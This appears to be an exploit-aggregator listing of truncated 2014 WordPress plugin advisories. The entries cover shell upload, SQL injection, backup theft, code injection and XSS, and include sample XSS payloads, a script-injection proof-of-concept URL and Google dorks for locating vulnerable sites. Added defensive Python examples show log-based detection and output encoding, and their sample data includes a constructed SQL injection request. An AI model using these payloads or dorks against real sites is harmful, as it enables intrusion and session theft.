WordPress Html5 Mp3 Player Full Path Disclosure

26 November 2014 - Source: http://www.mondounix.com
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz :  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
              DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/...

Read more »

WordPress wpDataTables 1.5.3 Shell Upload

26 November 2014 - Source: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...

Read more »

WordPress wpDataTables 1.5.3 SQL Injection

26 November 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from a SQL injection vulnerability.
 
The "table_id" parameter is not sanitized before it reaches the query.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable',...

Read more »
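The two wpDataTables entries above name the AJAX hooks involved: `wp_ajax_wdt_upload_file` (the upload handler, reachable without edit permission) and `wp_ajax_nopriv_get_wdtable` (anonymous table fetch with an unsanitized `table_id`). WordPress dispatches `/wp-admin/admin-ajax.php` on its `action` parameter to `wp_ajax_{action}` for logged-in users and `wp_ajax_nopriv_{action}` for anonymous ones, so both actions are visible in a web server access log. The following is an added example, not code from the advisories or from the plugin, that triages such a log for both issues; it is a detection rule, not an exploit. It assumes the Apache/nginx combined log format and that `action` appears in the query string; the lines in `SAMPLE_LOG` are constructed, not real traffic.

```python
"""Triage of admin-ajax.php traffic for the two wpDataTables actions in the advisories above.

Added example, not code from the advisories or the plugin. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Cheap SQL metacharacter/keyword hint: a triage signal, not a SQL parser.
SQLI_HINT = re.compile(r"['\"()]|--|/\*|\b(union|select|sleep|benchmark|or|and)\b", re.I)

SAMPLE_LOG = [
    # normal table fetch: numeric id
    '203.0.113.7 - - [22/Nov/2014:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=get_wdtable&table_id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # time-based injection attempt in table_id
    '203.0.113.7 - - [22/Nov/2014:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=get_wdtable&table_id=3%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"',
    # non-numeric id that is not obviously SQL
    '203.0.113.7 - - [22/Nov/2014:10:01:15 +0000] "GET /wp-admin/admin-ajax.php?action=get_wdtable&table_id=abc HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    # scripted client hitting the upload handler
    '198.51.100.4 - - [22/Nov/2014:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=wdt_upload_file HTTP/1.1" 200 88 "-" "python-requests/2.4.3"',
    # unrelated page view
    '192.0.2.10 - - [22/Nov/2014:10:03:00 +0000] "GET /?page_id=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return a dict with ip/method/path/status/query, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so these values are what PHP's $_GET would see
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec

def classify(rec):
    """Return a finding string for one parsed request, or None."""
    if rec is None or not rec["path"].endswith("/wp-admin/admin-ajax.php"):
        return None
    action = rec["query"].get("action")
    if action == "wdt_upload_file":
        # The advisory says this handler runs without any permission check,
        # so every hit is worth triage; a 200 means the upload path executed.
        return "wdt_upload_file reached (%s, status %s)" % (rec["method"], rec["status"])
    if action == "get_wdtable":
        table_id = rec["query"].get("table_id", "")
        if not table_id.isdigit():
            # A table id should be an integer. Anything else is tampering, and SQL
            # metacharacters make it a probable injection attempt.
            kind = "sqli" if SQLI_HINT.search(table_id) else "tampering"
            return "get_wdtable %s: table_id=%r" % (kind, table_id)
    return None

def scan(lines):
    """Run classify() over raw log lines; returns (ip, finding) pairs in log order."""
    out = []
    for line in lines:
        rec = parse_line(line)
        finding = classify(rec)
        if finding:
            out.append((rec["ip"], finding))
    return out

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

One caveat for anyone running this against real logs: an access log only shows `action` when the client put it in the query string. A POST that carries `action=wdt_upload_file` in the form body looks like a bare POST to admin-ajax.php, so either log request bodies at the WAF or PHP layer, or correlate every POST to admin-ajax.php from a client without a `wordpress_logged_in_*` cookie with new files under the uploads directory.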

WordPress WP-DB-Backup 2.2.4 Backup Theft

26 November 2014 - Source: http://www.mondounix.com
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Brute-forces and searches a WordPress target site with the WP-DB-Backup v2.2.4 plugin installed for any backups made on
#20141031; assumes the WordPress database is named "wordpress" and the table prefix is "wp_"
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
 
DATE="20141031"; #Date to search
 
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16]...

Read more »

WordPress CM Download Manager 2.0.0 Code Injection

22 November 2014 - Source: http://www.mondounix.com
Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
A code injection vulnerability has been found and confirmed in the software as an anonymous user. A successful attack could allow an anonymous attacker to gain full control of the application and the ability to use any operating system functions that are available to the scripting environment....

Read more »

WordPress SP Client Document Manager 2.4.1 SQL Injection

22 November 2014 - Source: http://www.mondounix.com
Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
Multiple SQL injection vulnerabilities have been found and confirmed in the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes stored in the database....

Read more »

WordPress 3.9.2 Cross Site Scripting

21 November 2014 - Source: http://www.mondounix.com
 
OVERVIEW
========
 
A security flaw in WordPress 3 allows injection of JavaScript into certain text fields. In particular, the problem affects comment boxes on WordPress posts and pages. These don't require authentication by default.
 
The JavaScript injected into a comment is executed when the target user views it, either on a blog post, a page, or in the Comments section of the administrative Dashboard.
 
In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links, so that the comment lands in the moderation queue. The exploit is then not visible to normal users, search engines, etc.
 
When a blog administrator goes to the Dashboard/Comments section to review new comments,...

Read more »

WordPress SupportEzzy Ticket System 1.2.5 Cross Site Scripting

14 November 2014 - Source: http://www.mondounix.com
# Exploit Title: SupportEzzy Ticket System - WordPress Plugin Stored XSS Vulnerability
# Date: 12-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.2.5
# Vendor Homepage: http://codecanyon.net/item/supportezzy-ticket-system-wordpress-plugin/8908617
# Software Test Link: http://demo.cssjockey.com/cjsupport/supportezzy/
# Tested on: Iceweasel and Chrome
 
# Vulnerabilities Description:
 
===Stored XSS===
Register and log in to the system, then submit a new ticket. The "URL (optional)"
input is not sanitized. You can run XSS payloads; use the sample payload to test.
 
Sample Payload for Stored XSS: http://example.com
"><script>alert(document.cookie);</script>
 
===Solution===
Filter the input...

Read more »

WordPress Classifieds Cross Site Scripting – SQL Injection

10 November 2014 - Source: http://www.mondounix.com
Exploit Title: Another Wordpress Classifieds Plugin SQL injection and Cross Site Scripting
Author: dill
Download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/
Client Webpage: http://awpcp.com/
 
Issue number 1: Cross-site scripting (reflective) 
 
Details: 
The name of an arbitrarily supplied URL parameter (see the PoC below, where the payload sits in the parameter name) is copied into the value of an HTML tag attribute and encapsulated in double quotation marks. This is then echoed in the application's response.
 
Proof-of-Concept (PoC): 
http://vulnerable.server/?page_id=16587&step=send-access-key&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1
 
Issue number 2: SQL injection
Details:
The parameter “keywordphrase” is susceptible to a...

Read more »
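The two XSS entries above (SupportEzzy's "URL (optional)" field and the AWPCP parameter-name reflection) are the same bug class: attacker text lands inside a double-quoted HTML attribute and a `">` closes it. The following is an added example, not code from either plugin. It assumes, from the AWPCP PoC, a page that re-emits every incoming query parameter as a hidden form field, and a ticket view that turns the user-supplied URL into a link; the `*_vulnerable` functions reproduce the defect and the `*_safe` ones apply the fix the SupportEzzy advisory summarises as "filter the input": attribute encoding, plus, going one step beyond the advisories, a scheme allowlist for the link target, since encoding alone does not stop a `javascript:` URL. The SupportEzzy payload is the advisory's two lines joined into one string.

```python
"""Attribute-context XSS: vulnerable rendering beside its hardened form.

Added example, not code from SupportEzzy or AWPCP. The hidden-field page and the
ticket link page are assumed shapes; the payloads are the ones quoted in the advisories.
"""
from html import escape
from urllib.parse import parse_qsl, urlsplit

# PoC URL from the AWPCP entry: the payload is the parameter *name*, its value is "1".
AWPCP_POC = ("http://vulnerable.server/?page_id=16587&step=send-access-key"
             "&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1")
# Sample payload from the SupportEzzy entry, as one string.
SUPPORTEZZY_POC = 'http://example.com"><script>alert(document.cookie);</script>'

def hidden_fields_vulnerable(url):
    """Copies every parameter name and value into a double-quoted attribute unencoded."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return "\n".join('<input type="hidden" name="%s" value="%s">' % (k, v) for k, v in pairs)

def hidden_fields_safe(url):
    """Same page, with attribute encoding (quote=True also encodes the double quote)."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return "\n".join(
        '<input type="hidden" name="%s" value="%s">' % (escape(k, quote=True), escape(v, quote=True))
        for k, v in pairs
    )

def ticket_link_vulnerable(user_url):
    """Echoes the ticket's optional URL straight into href and link text."""
    return '<a href="%s">%s</a>' % (user_url, user_url)

def ticket_link_safe(user_url):
    """Reject non-http(s) schemes, then attribute-encode what is rendered."""
    scheme = urlsplit(user_url).scheme.lower()
    if scheme not in ("http", "https"):
        return ""
    return '<a href="%s">%s</a>' % (escape(user_url, quote=True), escape(user_url))

def breaks_out(html):
    """True if a payload escaped its attribute and opened a script element."""
    return "<script>" in html.lower()

if __name__ == "__main__":
    print(hidden_fields_vulnerable(AWPCP_POC))
    print(hidden_fields_safe(AWPCP_POC))
    print(ticket_link_vulnerable(SUPPORTEZZY_POC))
    print(ticket_link_safe(SUPPORTEZZY_POC))
```

In WordPress code the equivalent of `escape(..., quote=True)` is `esc_attr()` and the scheme check is `esc_url()`; the point of the example is that the fix belongs at the output context (the attribute), not in a generic input filter, because the same string is harmless in a text node and dangerous inside `href="..."`.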

WordPress Wordfence Firewall 5.1.2 Cross Site Scripting

8 November 2014 - Source: http://www.mondounix.com
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site scripting vulnerability.
===============================================
 
Product: Wordfence Firewall Plugin For Wordpress 
Vendor: Wordfence
Vulnerable Version(s): 5.1.2
Tested Version: 5.1.2
Advisory Publication:  June 30, 2014  [without technical details]
Vendor Notification: June 24, 2014 
Vendor Patch: June 29, 2014 
Public Disclosure: June 30, 2014 
Vulnerability Type: Reflected Cross-Site Scripting
CVE Reference: CVE-2014-4664
Risk Level: High
Solution Status: Fixed by Vendor
---------------------------------------------------------------
Reported By  - Narendra Bhati ( R00t Sh3ll)
Security Analyst  @ Suma Soft Pvt. Ltd. ( IT Risk & Security...

Read more »